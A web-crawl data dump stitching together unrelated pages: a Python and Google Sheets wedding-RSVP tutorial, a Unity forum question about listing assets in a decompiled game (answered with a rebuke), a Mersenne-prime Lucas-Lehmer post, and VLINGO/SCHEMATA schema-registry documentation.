text
stringlengths
20
1.01M
url
stringlengths
14
1.25k
dump
stringlengths
9
15
lang
stringclasses
4 values
source
stringclasses
4 values
Automating Wedding RSVPS with Python and Google Docs This past year I got married, and it was a blast. After months and months of planning, we lucked out and nothing major went wrong on the day of (despite some last minute rain forecasts for our outdoor venue). During the planning process, we ran into all of the usual challenges. To make matters worse, I was living in CA at the time while my fiancée was in NJ, and we were both busy with school (astrophysics Ph.D. for me, M.D. for her). Unsurprisingly, we looked for every opportunity to make the planning easier. As one example, I made an automated, online RSVP system for our wedding website. After some initial set-up, we were able to sit back and watch our master guest list (stored on our Google Drive) track the RSVP responses of our guests. And better yet, the whole thing was free. There are a lot of options out there for online RSVP forms, but nearly all of them charge some sort of fee. So, I ended up combining a bunch of free services, and using some Python to glue them together, to build our RSVP system. In this post, I'm going to outline the main steps involved in the hope that it might make wedding planning just a bit easier for some future couple. Our system relies on Google Drive for tracking RSVPs, and I've provided example (and anonymized) files here. Using the JotForm service¶ To start, we need to set up the online form. There are a lot of options.!). JotForm has a free tier with 100 form submissions, and it offers several ways to increase that limit (e.g., social media follows, etc). We ended up with 200 form submissions for free, which was more than enough for us. Let's dive into the form. We'll use some Star Wars inspired names to explore the available functionality. Try entering "Luke Skywalker" into the form below, and watch the yes/no RSVP options appear. Now, try entering "Leia" into the first name box. Not only will the entry for Leia appear but also the entry for her plus one (Han Solo). Using these two types of entries, we were able to support guest RSVPs with and without accompanying plus ones. JotForm allows a lot of customization regarding the condition logic. For example, you can set up the form so guests can also use the plus one's name — try inputing "Han" into the first name box. So, after creating a new form on JotForm, we added a new entry block to the form for each guest on our guest list and attached conditional logic to each such that the correct options were shown when the "First Name" and "Last Name" fields were filled in. Since we had roughly 150 invited guests, this was by far the most time consuming step of this whole process. I didn't find any good way of automating this step, but that would be worth exploring if you happened to have many more invited guests than we did. Finally, JotForm allows you to link the form to your Google account, and will output the submission to a spreadsheet in your Google Drive. Unfortunately, the conditional logic used above makes the output table nearly unreadable. Each row in the spreadsheet corresponds to a different submission, and each column corresponds to a guest's name. With hundreds of invited guests, there are a lot of empty cells in need of consolidation. More on this in the next section. Formatting the JotForm submissions with Python¶ To overcome the deficiencies of the JotForm output format, I wrote a short Python script to grab the Google spreadsheet output by JotForm, clean and re-format the submissions, and re-upload the results to our own master guest list. The code can be found on my GitHub. It relies on a handy little software package called df2gspread that makes managing Google spreadsheets in Python particularly easy using pandas. To get started, you'll need to setup your Google API credentials in order to query Google Drive from Python. The process is straightforward, and instructions can be found here. Let's take a look at the format of the Google spreadsheet output by JotForm. The spreadsheet is available for browsing here. We'll load the spreadsheet into a pandas DataFrame using the unique identifier assigned to every Google spreadsheet (the long string of numbers and letters in the spreadsheet URL). from df2gspread import gspread2df as g2d ID1 = "1_hoBn8_0U9kurUFrr3sv6HAR_TCt2GlRL547G4ZZI7w" raw_rsvps = g2d.download(ID1, 'Sheet1', col_names=True, row_names=False, start_cell='A1') Let's take a peek at the first 10 rows of the raw RSVPs (note that you can scroll left to right in the output below to see all of the columns). raw_rsvps.head(n=10) 10 rows × 120 columns With 120 columns, this format leaves a lot to be desired. In any given row, nearly all of the columns are empty, except for those corresponding to the guest that submitted the form. The information in the table begs to be consolidated, and with just a few lines of Python, we can turn this format into something much more useful. The compute_rsvps.py script on my GitHub takes the raw JotForm output and consolidates the information into a usable format. An example spreadsheet output by the script is available as the "RSVP Submissions" sheet of this spreadsheet. Let's load this spreadsheet into a pandas DataFrame and take a look. ID2 = "1iEAfk1cVG_PwhcwKJxUeLycUIsRhsAsp9e4xCk2qLtM" cleaned_rsvps = g2d.download(ID2, 'RSVP Submissions', col_names=True, row_names=False, start_cell='A6') cleaned_rsvps.head(n=10) This format is looking much better. We've stripped out all of the unnecessary information, leaving only the submission date, guest name, RSVP, and any special requests or comments. While we could stop here, my wife and I wanted to be extra lazy and have our "master" guest list automatically updated with these RSVP responses. We'll tackle that in the next section. Updating a master RSVP list¶ Managing the guest list for a wedding is notoriously difficult. After a few iterations, my wife and I found a system that worked for us. We created a "master" guest list using a spreadsheet on Google Drive that not only included guest names but also added "Expected RSVP" and "Actual RSVP" columns. We then used our Python script to update the "Actual RSVP" column. As RSVPs started to roll in, this format allowed us to quickly see how realistic our total guest count estimate was (and update our vendors accordingly). Our (anonymized) guest list spreadsheet is available as the "RSVP List" sheet of this spreadsheet. Here's a screenshot of the spreadsheet. We found the summary statistics on the right hand side of this spreadsheet to be very useful throughout the planning process. Even better, the Python script only updates the individual cells of the "Actual RSVP" column (column D above) for those guests who RSVP'ed online. So, if you are like us, and have to use traditional hard-copy RSVPs for some of your guests, you'll be able to manually update the "Actual RSVP" column for those guests without losing that information. And that's it! In practice, we embedded our JotForm RSVP form on our Squarespace website, and when JotForm alerted us via email when a new submission was received, I simply ran the compute_rsvps.py script on my laptop and our guest list was instantly updated with the new responses. A User's Guide¶ To set up a version of this system for yourself, there are a few steps required. You'll need a local Python installation on your laptop (I recommend using Anaconda). The necessary steps are: - Set up a JotForm account and clone the Wedding RSVP template form discussed in this post. The template is available here. - For each guest on your guest list, add conditional logic to the form to show the desired Yes/No fields based on the "First Name" and "Last Name" input values. - Add the "Google Drive" integration for your form and take note of the unique identifier of the output spreadsheet. - Copy the "master" guest list spreadsheet template (available here) to your own Google Drive, and input your guest list on the "RSVP List" sheet. Take note of the unique identifier of the cloned spreadsheet. - Setup Google Drive API credentials, following the instructions here. - Download the compute_rsvps.pyscript from my GitHub, and make sure the dependencies are also installed (following the README on my GitHub). - At the bottom of the compute_rsvps.pyscript, update the "YES" and "NO" variables with the RSVP messages you used on your form. Also, update the "JOTFORM" variable with the identifier of the spreadsheet output by JotForm (see step #3), and update the "UPLOAD" variable with the identifier of the final spreadsheet that holds the master guest list (see step #4). - Run the compute_rsvps.pywhenever a new submission is received. - Sit back and relax! (Or plan the rest of your wedding.) My wife and I found this system to be very helpful for managing RSVPs, and we hope it can help simplify the wedding planning process for others. Leave a comment below if you have any questions! Thanks for reading! This post was written entirely in the Jupyter notebook. You can download this notebook, or see a static view on nbviewer.
http://nickhand.github.io/blog/pages/2018/01/10/automating-wedding-rsvps/
CC-MAIN-2019-22
en
refinedweb
> Question is off-topic or not relevant Hello ! I have a particular request : I'm currently making a "training hack pack" for a Unity game I speedrun. To do so, I decompile the game files, add my lines of code and recompile them. It works well and I've been able to add many training features, but I would love to be able to add a functionality to load any asset on demand.To load an asset , it seems that Resources.Load() is the way to go. However, I have no clue about the internal structure of the "resources" folder, since all the assets are compiled in .assets files without any reference of the original structure, so I don't know the path I need to give to the function. In the game code, Resources.Load() is never called to load an asset so I can't mimic their path. So my question is : in this context, is there a way to get a list of assets I can load (with their full path) ? What I've tried yet : I've tried to decompile files like "mainData", "resources.assets" or "sharedassetsX.assets", using many softwares, I see a lot of elements I would love to load, but no pathes I've seen a lot answers using "AssetDatabase" or "EditorUtility", but I don't seem to have access of those (I can't use the UnityEditor namespace in this context, remember that I decompile/recompile an existing game, I'm not in the Unity Editor) I've tried using a C# file browsing like in this post, but the result if just listing all the ".assets" files that are at the root of the game folder. Thank you =) ! ~MetalFox Dioxymore Answer by Bunny83 · Jul 16, 2018 at 12:11 PM There may be a way to extract the resources names from Unity's internal assetformat, however this question is not a development question related to game development in Unity and therefore off-topic. You are aware of the fact that you're most likely violating the copyright of the rights holder of the game you're decompiling? It's kind of embarrassing to see script kiddies to reach out to professional game developers to get assistance on their hacking. Resources.Load doesn't work at runtime 0 Answers Export objects to a .3DS file at runtime 1 Answer resources not loadable in bulid 1 Answer Resources.Load returns null in a build, but works in editor 2 Answers Issues with TextAsset , Resources.Load , and mp3 audio 0 Answers
https://answers.unity.com/questions/1529582/get-the-list-of-foldersprefabs-at-runtime.html
CC-MAIN-2019-22
en
refinedweb
The nth Mersenne number is Mn = 2n – 1. A Mersenne prime is a Mersenne number which is also prime. So far 50 51 have been found [1]. A necessary condition for Mn to be prime is that n is prime, so searches for Mersenne numbers only test prime values of n. It’s not sufficient for n to be prime as you can see from the example M11 = 2047 = 23 × 89. Lucas-Lehmer test The largest known prime has been a Mersenne prime since 1952, with one exception in 1989. This is because there is an efficient algorithm, the Lucas-Lehmer test, for determining whether a Mersenne number is prime. This is the algorithm used by GIMPS (Great Internet Mersenne Prime Search). The Lucas-Lehmer test is very simple. The following Python code tests whether Mp is prime. def lucas_lehmer(p): M = 2**p - 1 s = 4 for _ in range(p-2): s = (s*s - 2) % M return s == 0 Using this code I was able to verify the first 25 Mersenne primes in under 50 seconds. This includes all Mersenne primes that were known as of 40 years ago. History Mersenne primes are named after the French monk Marin Mersenne (1588–1648) who compiled a list of Mersenne primes. Édouard Lucas came up with his test for Mersenne primes in 1856 and in 1876 proved that M127 is prime. That is, he found a 39-digit prime number by hand. Derrick Lehmer refined the test in 1930. As of January 2018, the largest known prime is M77,232,917. Related posts [1] We’ve found 51 Mersenne primes as of December 22, 2018, but we’re not sure whether we’ve found the first 51 Mersenne primes. We know we’ve found the 47 smallest Mersenne primes. It’s possible that there are other Mersenne primes between the 47th and the 50th known Mersenne primes, and there may be one hiding between the 50th and 51st.
http://www.statsblogs.com/2018/11/28/searching-for-mersenne-primes/
CC-MAIN-2019-22
en
refinedweb
#include <mw/chttpformencoder.h> A data supplier class that is used to build up data that is to be encoded to application/x-www-form-urlencoded. A client will create an instance of this class and add name/value pairs. They then use this as the data supplier for the body of an http request that is a forms submission. The name and value must both be supplied in the correct character encoding that you want to send to the server. This then gets url encoded. Reimplemented from MHTTPDataSupplier::GetNextDataPart(TPtrC8 &) Obtain a data part from the supplier. The data is guaranteed to survive until a call is made to ReleaseData(). Reimplemented from MHTTPDataSupplier::OverallDataSize() Obtain the overall size of the data being supplied, if known to the supplier. Where a body of data is supplied in several parts this size will be the sum of all the part sizes. If the size is not known, KErrNotFound is returned; in this case the client must use the return code of GetNextDataPart to find out when the data is complete. Reimplemented from MHTTPDataSupplier::ReleaseData() Release the current data part being held at the data supplier. This call indicates to the supplier that the part is no longer needed, and another one can be supplied, if appropriate. Reimplemented from MHTTPDataSupplier::Reset() Reset the data supplier. This indicates to the data supplier that it should return to the first part of the data. This could be used in a situation where the data consumer has encountered an error and needs the data to be supplied afresh. Even if the last part has been supplied (i.e. GetNextDataPart has returned ETrue), the data supplier should reset to the first part. If the supplier cannot reset it should return an error code; otherwise it should return KErrNone, where the reset will be assumed to have succeeded
http://devlib.symbian.slions.net/belle/GUID-C6E5F800-0637-419E-8FE5-1EBB40E725AA/GUID-604D8C43-93F7-3835-8810-BD1CC891D086.html
CC-MAIN-2019-22
en
refinedweb
Edit file through telnet possible? Is it possible to edit files using Telnet? @jmarcelino Oh yes, I forgot the connect command of rshell. You can also edit through that tool, with edit filename - jmarcelino last edited by jmarcelino @misterlisty I've had great success using the MicroPython rshell tool from over telnet After running rshell just do: connect telnet your IP address and you should then see the LoPy filesystem on /flash Note that you the board must be in the REPL, if it's running a script you must terminate it @misterlisty I'm correcting my notes: Used this little script for step a) import sys def getfile(path): print("Send file contents line by line, finish with Crl+C-Enter.") with open(path, "w") as f: while 1: try: l = sys.stdin.readline() except KeyboardInterrupt: break f.write(l) print(".", end="") It does not echo, but you have to end it with an error. b) use the command getfile("name") and then paste it from Teraterm (alt-v). In teraterm's special settings, use a long value for delay between lines for paste, like 100m. That way, I was able to upload a ~900 line python file (the editor). @misterlisty You might be able to upload a file in two steps a) Upload a script which received data & puts it into a file: def newfile(path): print("Type file contents line by line, finish with EOF (Ctrl+D).") with open(path, "w") as f: while 1: try: l = input() except EOFError: break f.write(l) f.write("\n") Push Ctrl-E, paste the few lines about, and push Ctrl-D. Then you have the function newfile in RAM. b) You can use that to upload another file. But that must be done slow. TeraTerm has an ASCII-Upload feature, which sends files line-by-line with an delay between the lines. You could use that to upload the changed files. I have an editor which works on the board. It is here:. I normally have it in flash. The editor is too large for devices w/o PSRAM to be executed from RAM. But you may be able to send your file the way sketched above. Edit: Just tried my suggestion myself. Works not really well. Uploading the newfile() function works, but TeraTerm does not work well in an attempt to send that file, or the LoPy stalls, at least if it's more than a few lines of code. i forgot to open ftp port on the router on remote site. @misterlisty How did you disable ftp, and can you enable it again though repl? I have deployed some devices in the filed and have only enabled telnet instaead of telnet/ can i edit a file using REPL until i get access to them again. - jmarcelino last edited by jmarcelino It’s possible but very cumbersome, you’d have to do it using Python on the REPL. Why not use FTP instead which is also available?
https://forum.pycom.io/topic/2621/edit-file-through-telnet-possible/1
CC-MAIN-2019-22
en
refinedweb
Code igniter php xml parser jobs import 2 xml of different language , WPML setup , site is already done, Can i get an infograhic made up please. Thanks, Scott ... have a at90usb162 demo board able to act as select key and output the text automatically without waiting any key press. ...[login to view. ...listens for data (basically a number) from a pressure sensor on a plugged in USB interface and displays the data on screen. The data should be presented as numeric and as QR-Code (or as 'waiting for data'). Specs for the USB pressure sensor: [login to view URL] When starting the Raspberry Pi the I have nrfl24l01 modules that let me have a sensor wireless, base connected to the pc. i want to have multiple sensor that make this thing [login to view URL] and that are controlled by the led.. [login to view URL] [login to view URL] This is a shell program that runs on a gcc compiler, x86-64 architecture and CentOS. I want a program for a travelling salesman problem with high efficiency. My budget is $150 only dont bargain and waste time .. I need a new website. I already have a design, I just need you to build it. We have a working custom parser and would like to update to support a few changes to the grammar. Candidate should have demonstrated experience in working with parsing tools. References absolutely required.". Hi I'm going to customize the think-cell style. 1) Do you have already experiences to customize the style? 2) Do you have good knowledge about MS Office Open XML style? Please apply if you can say "yes". Develop a code in C# .net to get the configuration of the systems connected over a LAN , configurations include MAC address, process id , pc name , processor, OS and other hardware [login to view URL] code should be developed using visual studio by microsoft. php code debugging that is not enetering into the execute project Problem Statement Web UI Views are required to be created for existing database project. Database is defined using Code first and contains entities schema. WebUI Project Requirement Required using ASP.NET MVC Views: Web UI should have List Create, Update and Delete pages for following entities: • Customer o Customer MetaData (JSON Editor required) •! I need an interpreter made by java. - operations -Requirements Database and XML - Realizing database - Transactions - Query Operations - XML ...developer. I'm trying to learn multithreading basics for image processing in C++. I come from a different API background where I've done this often and I'm trying to get my code ported to C++ using the std::thread function. This is my current pseudocode: static const int num_threads=4; void FilterImage (int x1, int x2, int x3, int threadNr) { ...Requirements: * PHP 5.5.7 compatible (running on a Windows Server 2012, IIS) * MySQL 5.0.11 compatible * JQuery 1.4.4 is available but not required to use * All development will need to take place on YOUR system. Deliverable should be a zip file with all needed files so that we can drop it onto our web server. * Adequate in-line documentation of the code * Brief .. ..: [login to view URL] SII documentation : Document! I'm using this API ([login to view. we need to purchase i need android and desktop for multiple roullette games. i can buy at once no backend needed we already have in php. Hello, Guys! I am looking for someone that can build chrome browser source code completely. Below is link of source. [login to view URL] If someone can do this job, please apply.%; over...
https://www.freelancer.com/job-search/code-igniter-php-xml-parser/2/
CC-MAIN-2019-22
en
refinedweb
#include <app/cntfldst.h> Provides access to the text stored in a contact item field. An object of this class can be retrieved using CContactItemField::TextStorage(). Reimplemented from CContactFieldStorage::ExternalizeL(RWriteStream &)const Externalises the field data. Reimplemented from CContactFieldStorage::InternalizeL(RReadStream &) Internalises the field data. Reimplemented from CContactFieldStorage::IsFull()const Tests whether the field storage contains data. Reimplemented from CContactFieldStorage::RestoreL(CStreamStore &,RReadStream &) Restores the field data. Converts an array of text strings from plain text into Symbian editable text, appends them to a single descriptor, separating them with the new line character, and sets this as the text which is stored in the field. Any existing field text is replaced. The text is truncated to KCntMaxTextFieldLength characters if necessary. Converts a text string from plain text into Symbian editable text, and sets this as the text which is stored in the field. The text is truncated to KCntMaxTextFieldLength characters if necessary. Sets the field text. The text field object takes ownership of the specified descriptor. The function cannot leave. Sets the field text from a descriptor array. Each descriptor in the array is appended to the text field storage. They are separated by paragraph delimiters (CEditableText::EParagraphDelimiter). Any existing text is replaced. Sets the field text. This function allocates a new HBufC descriptor, deleting any existing one, and copies the new text into it. The function can leave. Converts a copy of the text stored in the field from Symbian editable text format into plain text and returns it as a pointer descriptor. Reimplemented from CContactFieldStorage::StoreL(CStreamStore &)const Stores the field data.
http://devlib.symbian.slions.net/belle/GUID-C6E5F800-0637-419E-8FE5-1EBB40E725AA/GUID-429B1D62-189C-3DE1-AABD-C162B0593992.html
CC-MAIN-2019-22
en
refinedweb
Source: Deep Learning on Medium I had very terrible experience while installing TensorFlow-Gpu on windows 7 using pip, I followed exactly the same process as they mentioned in the document but I had a problem with my local system with default Python version 3.7 . Every time when I feel , have done with the installation ,I find following error while importing Tensorflow or Keras in python . ImportError: DLL load failed: The specified module could not be found I have tried to uninstall python and conda then reinstalled every thing form scratch but ended up in same result. Later I found an instance of my environment was pointing to the default Python (3.7)installed earlier which was not remove while I uninstalled it so I removed it from C\User\Sunil\AppData\Roaming\Python ,then followed the below steps and installed successfully !! Hurray!!!!!!!!!! First thing first Install Anaconda(latest) and Python 3.6 ,I chose to install it in an virtual environment as it is the recommended process . Before going to install TensorFlow — GPU make sure you satisfy the following Software and Hardware requirement . Hardware :- NVIDIA® GPU card with CUDA® Compute Capability 3.5 or higher , you can check here Software : i)NVIDIA GPU Drivers : CUDA 9.0 requires 384.x or higher. To verify this -> Open Control Panel -> Hardware ->NVIDIA Control Panel →System Information (Bottom left) → Global Settings, now you can see the CUDA Version . ii)Cuda Toolkit : TensorFlow supports CUDA 9.0. Follow the instructions You can select exe(network) or exe(local) , I have selected exe(network) iii) Download cuDNN by signing up on Nvidia Developer from here iv)Install cuDNN by extracting the contents of cuDNN into the Toolkit path installed in Step 2. Once the download is done, open the zip file and go into the binfolder. You should see the cudnn64_7.dll file. “C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v9.0\bin” v) Create a Virtual Environment for tensorflow-gpu using following command conda create --name tfgpuenv #####Activate the Environment by##### activate tfgpuenv ### Now you can see (tfgpuenv)C:\User\Sunil and follow the Final step to command to install TensorFlow-Gpu ,then you are done!!!! (tfgpuenv)C:\User\Sunil> conda install tensorflow-gpu vi) Test : Check you have properly installed and Gpu is linked to Tensoflow by following command. from keras.python.client import device_lib print(device_lib.list_local_device()) Sample Output :
https://mc.ai/install-tensorflow-gpu-on-windows/
CC-MAIN-2019-22
en
refinedweb
The VLINGO/SCHEMATA component is a schema registry. It provides the means for Bounded Contexts, à la services and applications, built using the VLINGO/PLATFORM to publish standard types that are made available to client services. The published standard types are known as schemas, and the registry hosts the schemas for given organizations and the services within. The VLINGO/SCHEMATA component supports what is know in DDD as the Published Language. If you have either of Vaughn Vernon's DDD books you can read more about Published Language in those. Still, we provide a basic overview of its uses here. A few very important points in conjunction with developing a Published Language are, A Published Language should not be directly related to the internal domain model of your Bounded Context, and the internal domain model of your Bounded Context should not depend on the types defined in your Published Language. The types defined in your Published Language may be fundamentally the same or similar, but they are not the same things. Separate the two. A Published Language is used for presenting API types and data in an open and well-documented way. These are used by clients to communicate with a Bounded Context, and for a Bounded Context to communicate with client services outside its boundary. Your domain model is more closely tied to the concepts learned and discovered by your team that are related to its shared mental model and specific Ubiquitous Language. A Published Language is driven by the needs of Bounded Contexts (clients, or otherwise collaborating/integrating applications and services) outside your Bounded Context that needs to use data to communicate and/or understand the outcomes that your Bounded Context produces. Your Published Language should be based on your Ubiquitous Language, but it may not (and often should not) share everything about its internal structure, typing, and data. There is a Context Mapping strategic design pattern of DDD know as Conformist. Closely related to the previous point #3, the goal of Published Language is to prevent collaborating/integrating Bounded Contexts (clients, or otherwise collaborating/integrating applications and services) from conforming to your internal domain model. Instead they would adhere to a common standard Published Language, or even translate from a standard Published Language into their own Ubiquitous Language. If collaborators/integrators did conform directly to your Ubiquitous Language, every change in your domain model would ripple into their external Bounded Contexts, having negative maintenance impacts. There are times when being a Conformist can be advantageous. It requires less conceptual design to adhere to another model, but with almost no flexibility in your Context. In such cases, data types used by conforming collaborators/integrators can likewise be defined inside VLINGO/SCHEMATA. Even so, here we will focus on the more inviting and flexible Published Language. One exception to the strong suggestion for your domain model to not consume types from your Published Language may be with your Domain Events. It may make sense to use these in your domain model because it can reduce the amount of mapping between Domain Events defined in your domain model and those used for persistence and messaging, for example. Still, sharing types could be problematic and good judgment should be used in deciding whether or not to do so. This is generally a tradeoff in the development overhead of maintaining separate types and mapping them, and reducing the runtime overhead of mapping between types and the memory management garbage that this produces. The following provides some typical use cases that are supported by the Published Language of a given Bounded Context. There may be concepts and schema structuring that are unfamiliar, but any such will be explained soon. It's most important that you now understand why the VLINGO/SCHEMATA exists and why it is used. A client sends a Command request to a Bounded Context. The client must communicate that request using types and data that the Bounded Context understands. The Bounded Context defines a schema inside VLINGO/SCHEMATA such as: Org.Unit.Context.Commands.DoSomethingForMe. That Command has some data structure, such as for the REST HTTP request body payload, or for a message payload if using messaging. A client sends a Query request to a Bounded Context. For example, a client sends a GET request using REST over HTTP. The Bounded Context must respond with a result, and the 200 OK response body definition is defined as a Document. That Document result is defined in VLINGO/SCHEMATA and may have a name in the following format Org.Unit.Context.Documents.TypeThatWasQueried. After use case #1 above completes, the Bounded Context emits a DomainEvent. The type and data of that outgoing DomainEvent is defined in VLINGO/SCHEMATA and may have a name in the following format Org.Unit.Context.Events.SomethingCompleted. It is possible that any one of #1, #2, and/or #3 use additional complex data types within their definition. These additional complex data types would be defined by the Bounded Context under Org.Unit.Context.Data, perhaps as Org.Unit.Context.Data.SomethingDataType. It is possible (even likely) that any one of #1, #2, and/or #3, if based on messaging (or possibly even REST), will define one or more types within Org.Unit.Context.Envelope, such as Org.Unit.Context.Envelope.Notification. Such an Envelope type "wraps" a Command, a Document, and/or a Domain Event, and is used to communicate metadata about the incoming Command or the resulting Document and published Domain Event. The VLINGO/SCHEMATA presents the following basic logical interface and hierarchy. OrganizationUnitContextCommandsSchemaSchemaVersion (Specification, Version, Status)......DataSchemaSchemaVersion (Specification, Version, Status)......DocumentsSchemaSchemaVersion (Specification, Version, Status)......EnvelopesSchemaSchemaVersion (Specification, Version, Status)......EventsSchemaSchemaVersion (Specification, Version, Status)...... From the top of the hierarchy the nodes are defined as follows. Organization: The top-level division. This may be the name of a company or the name of a prominent business division within a company. If there is only one company using this registry then the Organization could be a major division within the implied company. There may be any number of Organizations defined, but there must be at least one. Unit: The second-level division. This may be the name of a business division within the Organization, or if the Organization is a business division then the Unit may be a department or team within a business division. Note that there is no reasonable limit on the name of the Unit, so it may contain dot notation in order to provide additional organizational levels. In an attempt to maintain simplicity we don't want to provide nested Unit types because the Units themselves can become obsolete with corporate and team reorganizations. It's best to name a Unit according to some non-changing business function rather than physical departments. Context: The logical application or (micro)service within which schemas are to be defined and for which the schemas are published to potential consumers. You may think of this as the name of the Bounded Context, and it may even be appropriate to name it the top-level namespace used by the Context, e.g. com.saasovation.agilepm. Within each Context there may be a number of category types used to describe its Published Language served by its Open Host Service. Currently these include: Commands, Data, Documents, Envelopes, and Events. Some of the parts are meant to help define other parts, and so are building blocks. Other parts are the highest level of the Published Language. These are called out in the following definitions. Commands: This is a top-level schema type where Command operations, such as those supporting CQRS, are defined by schemas. If the Context's Open Host Service is REST-based, these would define the payload schema submitted as the HTTP request body of PATCH, and PUT methods. If the Open Host Service is an asynchronous-message-based mechanism (e.g. RabbitMQ or Kafka), these would define the payload of Command messages sent through the messaging mechanism. Data: This is a building-block schema type where general-purpose data records, structures, or objects are defined and that may be used inside any of the other schema types (e.g. type Token). You may also place metadata types here (e.g. type Metadata or more specifically, type CauseMetadata). Documents: This is a top-level schema type that defines the full payload of document-based operations, such as the query results of CQRS queries. These documents are suitable for use as REST response bodies and messaging mechanism payloads. Envelopes: This is a building-block schema type meant to define the few number of message envelopes that wrap message-based schemas. When sending any kind of message, such as Command messages and Event messages, it is common to wrap these in an Envelope that defines some high-level metadata about the messages being sent by a sender and being received by a receiver. Events: This is a top-level schema type that conveys the facts about happenings within the Context that are important for other Context's to consume. These are known as Domain Events but may also be named Business Events. The reason for the distinction is that some viewpoints consider Domain Events to be internal-only events; that is, those events only of interest to the owning Context. Those holding that viewpoint think of events of interest outside the owning Context as Business Events. To avoid any confusion the term Event is used for this schema type and may be used to define any event that is of interest either inside or outside the owning Context, or both inside and outside the owning Context. Schema: Under every top-level schema category (or type, such as Commands and Events) are any number of Schema definitions. Besides a category, a Schema has a name and description. Every Schema has at least one Schema Version, which holds the actual Specification for each version of the Schema. Thus, the Schema itself is a container for an ordered collection of Schema Versions that each have a Specification. Schema Version: Every Schema has at least one Schema Version, and may have several versions. A Schema Version holds the Specification of a particular version of the Schema, and also holds a Description, a Semantic Version number, and a Status. The Description is a textual/prose description of the purpose of the Schema Version. Specification: A Schema Version's Specification is a textual external DSL (code block) that declares the data types and shape of the Schema at a given version. Any new version's Specification must be backward compatible with previous versions' of the given Schema if the new version falls within the same major version. The DSL is shown in detail below. Semantic Version: A semantic version is a three-part version, with a major, minor, and patch value, with each subsequent version part separated by a dot (decimal point), such as 1.2.3 for example. Here 1 is the major version, 2 is the minor version, and 3 is the patch version. If any two Schema Versions share the same major version then it is required that their Specifications must be compatible with each other. Thus, the newer version, such as 1.2.x, must be compatible with the Specification of 1.1.x, and 1.1.x must be compatible with 1.2.x. In this, the x is any patch version. Status: The Schema Version Status has three possible values, Draft, Published, and Removed. The Draft is the initial status and means that the Specification is unofficial and may change. Dependents may still use a Draft status Schema Version for test purposes, but with the understanding that the Specification may change at any time. When a Schema Version is considered production-ready, its status is upgraded to Published. Marking a Schema Version as Published is performed manually by the Context team after it has satisfied it's team and consumer dependency requirements. If, for some reason, it is necessary to forever remove a Schema Version, it can be marked as Removed status. It may then still be viewed but not used. It can only be "restored" by defining a new Schema Version with its specification, with the understanding that it may require modification to become backward compatible with any now previous version(s). The following demonstrates all the features supported by the typing language: {category} TypeName {type typeAttributeversion versionAttributetimestamp timestampAttributeboolean booleanAttribute = trueboolean[] booleanArrayAttribute { true, false, true }byte byteAttribute = 0byte[] byteArrayAttribute { 0, 127, 65 }char charAttribute = 'A'char[] charArrayAttribute = { 'A', 'B', 'C' }double doubleAttribute = 1.0double[] doubleArrayAttribute = { 1.0, 2.0, 3.0 }float floatAttribute = 1.0float[] floatArrayAttribute = { 1.0, 2.0, 3.0 }int intAttribute = 123int[] intArrayAttribute = { 123, 456, 789 }long longAttribute = 7890long[] longArrayAttribute = { 7890, 1234, 5678 }short shortAttribute = 32767short[] shortArrayAttribute = { 0, 1, 2 }string stringAttribute = "abc"string[] stringArrayAttribute = { "abc", "def", "ghi" }TypeName typeNameAttribute1category.TypeName typeNameAttribute2category.TypeName:1.2.1 typeNameAttribute3category.TypeName:1.2.1[] typeNameArrayAttribute1} The following table describes the available types and a description of each. Any given complex Schema type may be included in the Specification, but doing so may limit to some extent consumption across multiple collaborating technical platforms. We make every effort to ensure cross-platform compatibility, but the chosen serialization type may be a limiting factor. We thus consider this an unknown until full compatibility can be confirmed by you and your team. An additional warning is appropriate regarding direct domain model usage of Schema types. These Schema types are not meant to be used as first-class domain model Entities, Aggregates, or Value Objects. The Events category types may be used as Domain Events in the domain model, but if so we strongly suggest keeping the specifications simple (not include complex types). Thus, Define your domain model Entities and Value Objects strictly in your domain model code, not using a Schema Specification. Determine the positive and negative consequences of defining Domain Events only in the schema registry and using them both in the domain model and for your Published Language. It may or may not work well in your case. Schema Specifications are primarily about data and expressing present and past intent, not behavior. Consider Schema Specification to be more about local-Context migrations of supported Domain Events and inter-Context collaboration and integration of all other Schema types. VLINGO/SCHEMATA provides an HTTP API and a web user interface. Both can be used to manage master data, like organizations and units, as well as schema definitions. Typically, you'll use the GUI to edit master data and browse existing schemata and the API to integrate schema registry interactions with your development tooling and build pipelines. Maven users also have the possibility of using VLINGO/BUILD-PLUGINS to publish and consume schemas. The UI provides a treeview used to browse the available data and a view for each level in the hierarchy described above: Organizations, Units, Contexts, Schemas and Schema Versions. These are accessible via the menu to the left. We also have Dark Mode (top-right). The following shows the process of defining one Organization containing one Unit with a single Context. Once you did this, you can go ahead and define your Schemas along with their Schema Versions. When defining a Context, you need to use namespace syntax (e.g. com.example.demo): To be able to create concrete specifications (in Schema Versions), you'll first need to define the Schema meta data. You can choose between all the categories mentioned in Use Cases. When defining a Schema, use initial cap (e.g. SomethingDefined): When defining a Schema Version, we suggest to always keep semantic versions in order and without version gaps, so you should only use the three buttons for their respective purpose: While there are many benefits in keeping your specification sources with your project's source code, the GUI still provides an editor to work with specifications. One example use case for this is if you want to describe a contract or small API surface of an external system outside your control and consume the events it publishes. After now having defined one of every hierarchy-element, you can switch over to In the home view, you can browse existing Schema Versions by drilling down the hierarchy. Once you've selected the version you're interested in, you can: Review its specification Update its specification as long as the Schema Version is still a Draft Transition between the four lifecycle states Draft, Published, Deprecated and Removed Review source code generated from the specification (click on Code) Review and update its description (click on Description, then click on Preview) When you've made some changes to the description and decide not to save them, you can use Revert to just set it back to its initial state. After having defined a hierarchy element, you can also redefine it: This works with every hierarchy element, other than Schema Version, as it mustn't be modified if it is not still a Draft. If it is a Draft, you can modify it on Home. If not, you can define a new Schema Version. When publishing a new version of an existing schema, the updated specification is validated in regard to the new semantic version according to the following rules: New patch version (e.g. 1.2.5 to 1.2.6): The specification needs to remain unchanged, only meta data can be updated New minor version (e.g. 1.2.5 to 1.3.0): Only new fields may be added, there must be no removals, type changes or reordering of fields New major version (e.g. 1.2.5 to 2.0.0): No restrictions If these rules are violated, you'll be presented a list of additions, removals, reorderings and type changes. The colors correspond to the New Major/Minor/Patch button colors. After changing to a new major version, we can define without problems. The BUILD PLUGINS provides goals to talk to the schema registry as part of the build. To use it, include it in the build section of your project's pom.xml and configure the goals as shown below. <project ...><build><plugins><plugin><groupId>io.vlingo</groupId><artifactId>vlingo-build-plugins</artifactId><version>1.1.0</version><executions>...</executions></plugin></plugins></build>...</project> Schemata within the registry are identified by references consisting of organization, unit, context namespace, schema name, and schema version. A schema reference pointing to the Schema MySchema 1.0.5 in the namespace com.example of the unit RnD 